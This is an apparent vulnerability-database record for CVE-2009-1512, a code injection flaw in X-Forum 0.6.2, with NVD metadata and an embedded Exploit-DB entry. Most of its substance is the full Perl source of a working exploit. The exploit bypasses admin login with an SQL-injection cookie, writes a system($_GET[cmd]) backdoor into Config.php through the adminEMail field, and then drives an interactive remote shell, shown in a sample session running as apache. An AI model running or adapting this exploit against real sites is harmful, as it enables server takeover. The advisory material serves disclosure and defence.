ID CVE-2009-1512Type cveReporter NVDModified 2017-09-28T21:34:24
Description
Static code injection vulnerability in X-Forum 0.6.2 allows remote authenticated administrators to inject arbitrary PHP code into Config.php via the adminEMail parameter to SaveConfig.php.
{"id": "CVE-2009-1512", "bulletinFamily": "NVD", "title": "CVE-2009-1512", "description": "Static code injection vulnerability in X-Forum 0.6.2 allows remote authenticated administrators to inject arbitrary PHP code into Config.php via the adminEMail parameter to SaveConfig.php.", "published": "2009-05-01T18:30:00", "modified": "2017-09-28T21:34:24", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1512", "reporter": "NVD", "references": ["https://exchange.xforce.ibmcloud.com/vulnerabilities/50390", "https://www.exploit-db.com/exploits/8317"], "cvelist": ["CVE-2009-1512"], "type": "cve", "lastseen": "2017-09-29T14:26:36", "history": [{"bulletin": {"assessment": {"href": "", "name": "", "system": ""}, "bulletinFamily": "NVD", "cpe": ["cpe:/a:keir_davis:x-forum:0.6.2"], "cvelist": ["CVE-2009-1512"], "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "Static code injection vulnerability in X-Forum 0.6.2 allows remote authenticated administrators to inject arbitrary PHP code into Config.php via the adminEMail parameter to SaveConfig.php.", "edition": 2, "enchantments": {}, "hash": "0e598a612429bd51151110c662e147aaaa73c1b0c8d4ff6cb95fadd1a7c3170c", "hashmap": [{"hash": "aff38f99e0ce110b67fa437a8a9d33e5", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "scanner"}, {"hash": "ae5cb5bacaccc909594afd0585ad6db5", "key": "href"}, {"hash": "43b590b89e0f1501364bf505e785ebd0", "key": "title"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "f931d2ad216756f2fe565ea6fab7bac7", "key": "cvelist"}, {"hash": "e07c418bad8df66d6f29e15752d14707", "key": "references"}, {"hash": "6d3f4796275bb54c21a33b82f399cc6d", "key": "assessment"}, {"hash": "4fb521258e0a7c29cf216562ecfacbde", "key": "cpe"}, {"hash": "7acdec9394e8727f5f26518e860bf0e5", "key": "published"}, {"hash": "0d834454c80b684d1e82acbaa86b9b16", "key": "description"}, {"hash": "9acfc3ecd06539a3534549fd05dfad8e", "key": "cvss"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1512", "id": "CVE-2009-1512", "lastseen": "2017-08-17T11:14:19", "modified": "2017-08-16T21:30:23", "objectVersion": "1.3", "published": "2009-05-01T18:30:00", "references": ["http://www.milw0rm.com/exploits/8317", "https://exchange.xforce.ibmcloud.com/vulnerabilities/50390"], "reporter": "NVD", "scanner": [], "title": "CVE-2009-1512", "type": "cve", "viewCount": 0}, "differentElements": ["references", "modified"], "edition": 2, "lastseen": "2017-08-17T11:14:19"}, {"bulletin": {"assessment": {"href": "", "name": "", "system": ""}, "bulletinFamily": "NVD", "cpe": ["cpe:/a:keir_davis:x-forum:0.6.2"], "cvelist": ["CVE-2009-1512"], "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "Static code injection vulnerability in X-Forum 0.6.2 allows remote authenticated administrators to inject arbitrary PHP code into Config.php via the adminEMail parameter to SaveConfig.php.", "edition": 1, "enchantments": {}, "hash": "46bf2f1a9c13ab851c5b0a0c8ae8b68b09a8cb3f3776fda1d50a04bf06801e90", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "scanner"}, {"hash": "ae5cb5bacaccc909594afd0585ad6db5", "key": "href"}, {"hash": "43b590b89e0f1501364bf505e785ebd0", "key": "title"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "f931d2ad216756f2fe565ea6fab7bac7", "key": "cvelist"}, {"hash": "6d3f4796275bb54c21a33b82f399cc6d", "key": "assessment"}, {"hash": "4fb521258e0a7c29cf216562ecfacbde", "key": "cpe"}, {"hash": "7acdec9394e8727f5f26518e860bf0e5", "key": "published"}, {"hash": "29bed575a0be4639718ba0aa91d16226", "key": "references"}, {"hash": "0d834454c80b684d1e82acbaa86b9b16", "key": "description"}, {"hash": "9acfc3ecd06539a3534549fd05dfad8e", "key": "cvss"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "8acc51aa8916156c2539147dd352d209", "key": "modified"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1512", "id": "CVE-2009-1512", "lastseen": "2016-09-03T12:21:27", "modified": "2009-05-13T01:28:03", "objectVersion": "1.2", "published": "2009-05-01T18:30:00", "references": ["http://www.milw0rm.com/exploits/8317", "http://xforce.iss.net/xforce/xfdb/50390"], "reporter": "NVD", "scanner": [], "title": "CVE-2009-1512", "type": "cve", "viewCount": 0}, "differentElements": ["references", "modified"], "edition": 1, "lastseen": "2016-09-03T12:21:27"}], "edition": 3, "hashmap": [{"key": "assessment", "hash": "6d3f4796275bb54c21a33b82f399cc6d"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "4fb521258e0a7c29cf216562ecfacbde"}, {"key": "cvelist", "hash": "f931d2ad216756f2fe565ea6fab7bac7"}, {"key": "cvss", "hash": "9acfc3ecd06539a3534549fd05dfad8e"}, {"key": "description", "hash": "0d834454c80b684d1e82acbaa86b9b16"}, {"key": "href", "hash": "ae5cb5bacaccc909594afd0585ad6db5"}, {"key": "modified", "hash": "754aa99f1bae5fde5a67fda3de3f3179"}, {"key": "published", "hash": "7acdec9394e8727f5f26518e860bf0e5"}, {"key": "references", "hash": "4e5f3c171f7024a79aa0fe1e2ca347ad"}, {"key": "reporter", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "scanner", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "43b590b89e0f1501364bf505e785ebd0"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "f59abfce089be0328ba7ffef16829c717bb4f5296539deb453b97c6d34e795e3", "viewCount": 0, "enchantments": {"score": {"value": 7.5, "vector": "NONE", "modified": "2017-09-29T14:26:36"}, "vulnersScore": 7.5}, "objectVersion": "1.3", "cpe": ["cpe:/a:keir_davis:x-forum:0.6.2"], "assessment": {"href": "", "name": "", "system": ""}, "scanner": []}
{"exploitdb": [{"lastseen": "2016-02-01T04:14:23", "osvdbidlist": ["54194", "54190"], "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "references": [], "description": "X-Forum 0.6.2 Remote Command Execution Exploit. CVE-2009-1508,CVE-2009-1512. Webapps exploit for php platform", "reporter": "Osirys", "published": "2009-03-30T00:00:00", "type": "exploitdb", "title": "X-Forum 0.6.2 - Remote Command Execution Exploit", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2009-1512", "CVE-2009-1508"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "modified": "2009-03-30T00:00:00", "id": "EDB-ID:8317", "href": "https://www.exploit-db.com/exploits/8317/", "sourceData": "#!/usr/bin/perl\n\n# Web App: X-Forum 0.6.2\n# Link : http://freefr.dl.sourceforge.net/sourceforge/x-forum/xforum-0.6.2.tar.gz\n# Bug : Auth Bypass via Cookie Handling\n# : There are also other SQL Injections\n\n# Remote Command Execution Exploit\n# Credits to Giovanni Buzzin, \"Osirys\"\n# Mail osirys[at]autistici[dot]org\n\n# It logs in using an SQL Inj (AUTH BYPASS) via Cookie, then edits the configuration\n# putting in it the backdoor. Needs the nick of the admin !\n\n# ---------------------------------------------------------------------------\n# Sploit\n# ---------------------------------------------------------------------------\n# osirys[~]>$ perl spll.txt http://localhost/x-forum/xforum/ admin\n#\n# ----------------------------\n# X-Forum RCE Exploit\n# Coded by Osirys\n# ----------------------------\n#\n# [*] Bypassing Admin Login with a evil cookie !\n# [*] Admin Login Bypassed ..\n# [*] Getting previous configuration ..\n# [*] Previous configuration loaded ..\n# [*] Overwriting .....\n# [*] Configuration edited, backdoored !!\n# [*] Shell succesfully spawned !!\n# [:D Hi myLord, execute your commands !!\n#\n# shell[localhost]$> id\n# uid=80(apache) gid=80(apache) groups=80(apache)\n# shell[localhost]$> pwd\n# /home/osirys/web/x-forum/xforum\n# shell[localhost]$> exit\n# [-] Quitting ..\n#\n# osirys[~]>$\n# ---------------------------------------------------------------------------\n\nuse HTTP::Request;\nuse LWP::UserAgent;\nuse IO::Socket;\n\nmy $host = $ARGV[0];\nmy $user = $ARGV[1];\nmy $rce_p = \"/Config.php?cmd=\";\nmy @conf = ();\n\nchomp($user);\n$user =~ s/\\%([A-Fa-f0-9]{2})/pack('C', hex($1))/seg;\n$user =~ s/([^A-Za-z0-9])/sprintf(\"%%%02X\", ord($1))/seg;\n\n$cookie = \"cookie_username=\".$user.\"' or '1=1; cookie_password=p0wa\";\n\nhelp(\"-1\") unless (($host)&&($user));\ncheek($host) == 1 || help(\"-2\");\n&banner;\n\n$datas = get_data($host);\n$datas =~ /(.*) (.*)/;\n($h0st,$path) = ($1,$2);\n\nprint \"[*] Bypassing Admin Login with a evil cookie !\\n\";\nsocket_req(\"GET\",$path.\"/Configure.php\",$cookie,\"Manage Boards\",1);\nif ($gotcha == 1) {\n print \"[*] Admin Login Bypassed ..\\n\";\n}\nelse {\n print \"[-] Bad admin's nick or site not vulnerable !\\nn\";\n exit(0);\n}\nprint \"[*] Getting previous configuration ..\\n\";\nsocket_req(\"GET\",$path.\"/Configure.php\",$cookie,\"\",2);\n\nif (scalar(@conf) == 23) {\n print \"[*] Previous configuration loaded ..\\n\";\n}\nprint \"[*] Overwriting .....\\n\";\n\nmy $post = \"serverName=\".$conf[0].\"&userName=\".$conf[1].\"&password=\".$conf[2].\"&databaseName=\".$conf[3].\n \"&iconsDir=\".$conf[4].\"&buttonsDir=\".$conf[5].\"&emailPassword=FALSE&uniqueEMail=TRUE&member\".\n \"Level=0&memberStatus=1&memberGroup=1&threadStatus=1&postStatus=1&forumName=\".$conf[6].\"&ic\".\n \"onsPerRow=\".$conf[7].\"&boardImage=\". $conf[8].\"&boardImageNew=\". $conf[9] .\"&categoryImage=\"\n .$conf[10] .\"&categoryImageNew=\" . $conf[11] .\"&threadImage=\". $conf[12] . \"&threadImageNew=\"\n .$conf[13].\"&backColor=\".$conf[14].\"&textColor=\".$conf[15].\"&fontFace=\".$conf[16].\"&linkCol\".\n \"or=\".$conf[17].\"&borderColor=\". $conf[18].\"&titleColor=\".$conf[19].\"&bodyColor=\". $conf[20].\n \"&adminEMail=\".$conf[21].\"%22%29%3Becho+%22sp4wn%3Cbr%3E%22%3Bsystem%28%24_GET%5Bcmd%5D%29%\".\n \"3Bdefine%28%22p0wa%22%2C%22lol&logoutURL=\".$conf[22].\"&submit=Update+Configuration\";\n\n\n$post =~ s/,/%2C/g;\n$post =~ s/ /+/g;\n$post =~ s/#/%23/g;\n$post =~ s/@/%40/g;\n\nsocket_req(\"POST\",$path.\"/SaveConfig.php\",$cookie,$post,0,\"\",1);\n\nmy $exec_url = ($host.$rce_p);\nmy $re = get_req($exec_url);\nif ($re =~ /sp4wn/) {\n print \"[*] Configuration edited, backdoored !!\\n[*] Shell succesfully spawned !!\\n[:D Hi myLord, execute your commands !!\\n\\n\";\n &exec_cmd;\n}\nelse {\n print \"[-] Something wrong, sploit failed !\\n\\n\";\n exit(0);\n}\n\nsub socket_req() {\n my($request,$path,$cookie,$content,$opt,$regexp,$sock_opt) = @_;\n my $stop;\n my $length = length($content);\n my $socket = new IO::Socket::INET(\n PeerAddr => $h0st,\n PeerPort => '80',\n Proto => 'tcp',\n ) or die $!;\n\n if ($sock_opt == 1) {\n $opt_1 = \"Referer: \".$host.\"/Configure.php\\r\\n\";\n $opt_2 = \"Content-Type: application/x-www-form-urlencoded\\r\\n\";\n }\n else {\n $opt_1 = \"\";\n $opt_2 = \"\";\n }\n my $data = $request.\" \".$path.\" HTTP/1.1\\r\\n\".\n \"Host: \".$h0st.\"\\r\\n\".\n \"Keep-Alive: 300\\r\\n\".\n \"Connection: keep-alive\\r\\n\".\n $opt_1.\n \"Cookie: \".$cookie.\"\\r\\n\".\n $opt_2.\n \"Content-Length: \".$length.\"\\r\\n\\r\\n\".\n $content.\"\\r\\n\";\n\n $socket->send($data);\n while ((my $e = <$socket>)&&($stop != 1)) {\n if ($opt == 0) {\n $stop = 1;\n }\n elsif ($opt == 1) {\n if ($e =~ /$regexp/) {\n ($stop,$gotcha) = (1,1);\n }\n }\n elsif ($opt == 2) {\n get_previous_conf($e);\n }\n }\n}\n\nsub exec_cmd {\n $h0st !~ /www\\./ || $h0st =~ s/www\\.//;\n print \"shell[$h0st]\\$> \";\n $cmd = <STDIN>;\n $cmd !~ /exit/ || die \"[-] Quitting ..\\n\\n\";\n $exec_url = $host.$rce_p.$cmd;\n my $re = get_req($exec_url);\n my $content = tag($re);\n if ($content =~ m/sp4wn<br>(.+)/g) {\n my $out = $1;\n $out =~ s/\\$/ /g;\n $out =~ s/\\*/\\n/g;\n chomp($out);\n print \"$out\\n\";\n &exec_cmd;\n }\n else {\n $c++;\n $cmd =~ s/\\n//;\n print \"bash: \".$cmd.\": command not found\\n\";\n $c < 3 || die \"[-] Command are not executed.\\n[-] Something wrong. Exploit Failed !\\n\\n\";\n &exec_cmd;\n }\n\n}\n\nsub get_req() {\n $link = $_[0];\n my $req = HTTP::Request->new(GET => $link);\n my $ua = LWP::UserAgent->new();\n $ua->timeout(4);\n my $response = $ua->request($req);\n return $response->content;\n}\n\nsub cheek() {\n my $host = $_[0];\n if ($host =~ /http:\\/\\/(.+)/) {\n return 1;\n }\n else {\n return 0;\n }\n}\n\nsub get_data() {\n my $host = $_[0];\n $host =~ /http:\\/\\/(.*)/;\n $s_host = $1;\n $s_host =~ /([a-z.]{1,30})\\/(.*)/;\n ($h0st,$path) = ($1,$2);\n $h0st !~ /www/ || $h0st =~ s/www\\.//;\n $path =~ s/(.*)/\\/$1/;\n $full_det = $h0st.\" \".$path;\n return $full_det;\n}\n\nsub get_previous_conf() {\n my $string = $_[0];\n if ($string =~ /name=\"serverName\" size=\"60\" value=\"(.+)\">/) {\n push(@conf,$1);\n }\n elsif ($string =~ /name=\"userName\" size=\"60\" value=\"(.+)\">/) {\n push(@conf,$1);\n }\n elsif ($string =~ /name=\"password\" size=\"60\" value=\"(.+)\">/) {\n push(@conf,$1);\n }\n elsif ($string =~ /name=\"databaseName\" size=\"60\" value=\"(.+)\">/) {\n push(@conf,$1);\n }\n elsif ($string =~ /name=\"iconsDir\" size=\"60\" value=\"(.+)\">/) {\n push(@conf,$1);\n }\n elsif ($string =~ /name=\"buttonsDir\" size=\"60\" value=\"(.+)\">/) {\n push(@conf,$1);\n }\n elsif ($string =~ /name=\"forumName\" size=\"60\" value=\"(.+)\">/) {\n push(@conf,$1);\n }\n elsif ($string =~ /name=\"iconsPerRow\" size=\"60\" value=\"(.+)\">/) {\n push(@conf,$1);\n }\n elsif ($string =~ /name=\"boardImage\" size=\"60\" value=\"(.+)\">/) {\n push(@conf,$1);\n }\n elsif ($string =~ /name=\"boardImageNew\" size=\"60\" value=\"(.+)\">/) {\n push(@conf,$1);\n }\n elsif ($string =~ /name=\"categoryImage\" size=\"60\" value=\"(.+)\">/) {\n push(@conf,$1);\n }\n elsif ($string =~ /name=\"categoryImageNew\" size=\"60\" value=\"(.+)\">/) {\n push(@conf,$1);\n }\n elsif ($string =~ /name=\"threadImage\" size=\"60\" value=\"(.+)\">/) {\n push(@conf,$1);\n }\n elsif ($string =~ /name=\"threadImageNew\" size=\"60\" value=\"(.+)\">/) {\n push(@conf,$1);\n }\n elsif ($string =~ /name=\"backColor\" size=\"60\" value=\"(.+)\">/) {\n push(@conf,$1);\n }\n elsif ($string =~ /name=\"textColor\" size=\"60\" value=\"(.+)\">/) {\n push(@conf,$1);\n }\n elsif ($string =~ /name=\"fontFace\" size=\"60\" value=\"(.+)\">/) {\n push(@conf,$1);\n }\n elsif ($string =~ /name=\"linkColor\" size=\"60\" value=\"(.+)\">/) {\n push(@conf,$1);\n }\n elsif ($string =~ /name=\"borderColor\" size=\"60\" value=\"(.+)\">/) {\n push(@conf,$1);\n }\n elsif ($string =~ /name=\"titleColor\" size=\"60\" value=\"(.+)\">/) {\n push(@conf,$1);\n }\n elsif ($string =~ /name=\"bodyColor\" size=\"60\" value=\"(.+)\">/) {\n push(@conf,$1);\n }\n elsif ($string =~ /name=\"adminEMail\" size=\"60\" value=\"(.+)\">/) {\n push(@conf,$1);\n }\n elsif ($string =~ /name=\"logoutURL\" size=\"60\" value=\"(.+)\">/) {\n push(@conf,$1);\n }\n}\n\nsub tag() {\n my $string = $_[0];\n $string =~ s/ /\\$/g;\n $string =~ s/\\s/\\*/g;\n return($string);\n}\n\nsub banner {\n print \"\\n\".\n \" ---------------------------- \\n\".\n \" X-Forum RCE Exploit \\n\".\n \" Coded by Osirys \\n\".\n \" ---------------------------- \\n\\n\";\n}\n\nsub help() {\n my $error = $_[0];\n if ($error == -1) {\n &banner;\n print \"\\n[-] Bad Input!\\n\";\n }\n elsif ($error == -2) {\n &banner;\n print \"\\n[-] Bad hostname address !\\n\";\n }\n print \"[*] Usage : perl $0 http://hostname/cms_path admin_username\\n\";\n print \" admin_username is the nick of the admin.\\n\\n\";\n exit(0);\n}\n\n# milw0rm.com [2009-03-30]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/8317/"}]}
